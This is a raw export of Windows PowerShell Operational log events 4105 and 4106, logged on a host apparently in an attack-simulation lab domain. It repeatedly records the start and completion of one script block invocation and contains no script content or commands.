Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473581
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473580
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473579
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473578
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473577
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473576
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473575
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473574
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473573
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473572
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473571
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473570
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473569
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473568
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473567
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473566
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473565
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473564
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473563
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473562
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473561
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473560
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473559
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473558
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473557
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473556
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473555
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473554
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473553
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473552
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473551
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473550
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473549
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473548
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473547
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473546
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473545
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473544
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473543
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473542
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473541
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473540
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473539
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473538
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473537
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473536
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473535
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473534
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473533
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473532
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473531
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473530
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473529
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473528
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
